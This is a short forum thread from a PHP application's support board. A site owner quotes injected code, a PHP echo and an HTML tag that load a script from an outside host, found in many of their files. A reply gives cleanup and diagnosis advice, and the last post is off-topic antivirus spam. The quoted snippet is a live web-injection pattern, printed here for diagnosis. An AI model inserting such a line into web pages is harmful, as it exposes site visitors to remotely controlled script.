All times are UTC + 1 hour




Post new topic Reply to topic  [ 3 posts ] 
  Print view

Virus
Author Message
PostPosted: Tue Feb 12, 2013 10:41 am 
Regular
Offline

Joined: Fri Feb 20, 2009 4:12 pm
Posts: 66
Location: France
Hello,

I think that a virus has infected the Achievo application, here is the code:

Code:
<?
#148a41#
echo "<script type=\"text/javascript\" src=\"http://netstoragehost.com/1/ad.php?id=10\" name=\"umtx10\"></script>";
#/148a41#
?>


Code:
<!--148a41--><script type="text/javascript" src="http://netstoragehost.com/1/ad.php?id=10" name="umtx10"></script><!--/148a41-->


This code is inserted in javascripts files, and other files like index.php.

I did a search, found me 120 infected files.

I deleted these codes for all these files.

However this virus came back a second time. I would like to know if you know this problem.

Thanks for your help


Top
 Profile  
 

Re: Virus
PostPosted: Tue Feb 12, 2013 6:04 pm 
Regular
User avatar
Offline

Joined: Mon Nov 21, 2005 11:53 pm
Posts: 260
Location: Calgary, AB, Canada
Nat82 wrote:
I think that a virus has infected the Achievo application...


Are you referring to the production code on your server? In other words, you do *not* mean code downloaded from http://www.achievo.org or http://www.github.com/atkphpframework/achievo?

Assuming you mean the code on your server has been modified since you downloaded Achievo and put it on the server, something must have intentionally modified the code (obvious, I know). However, the code you have found is only the result of an exploited vulnerability, and not the exploit itself. It is possible that other files have been modified, which then allowed the attacker to modify files with the code you found. If possible, I suggest you immediately replace your Achievo code with a new copy, but keep your current code and diff it against the new code to confirm if there have been any other changes.

Achievo (so far as I am aware), does not have the ability to modify index.php or any other file. How are you hosting Achievo? Are there any hosting tools involved that could have been exploited? Can your config.inc.php file be accessed from the internet (which would expose your administrator password, although I can't think of how that would enable modifying code files)? Have you modified Achievo in any way, that could possibly have created a vulnerability?

Good luck!

_________________
Dale Scott
Transparency with Trust
http://www.dalescott.net


Top
 Profile  
 

Re: Virus
PostPosted: Wed Sep 18, 2013 8:12 am 
Offline

Joined: Wed Sep 18, 2013 5:47 am
Posts: 5
someone can suggest a good anti virus software for my laptop.
Currently I am using a AVAST but I am not satisfy from it's performance.

Your help will be greatly appreciated.

_____________________
Business Management Software


Top
 Profile  
 

Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 3 posts ] 

All times are UTC + 1 hour


Who is online

Users browsing this forum: No registered users and 30 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum

Search for:
Jump to:  
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group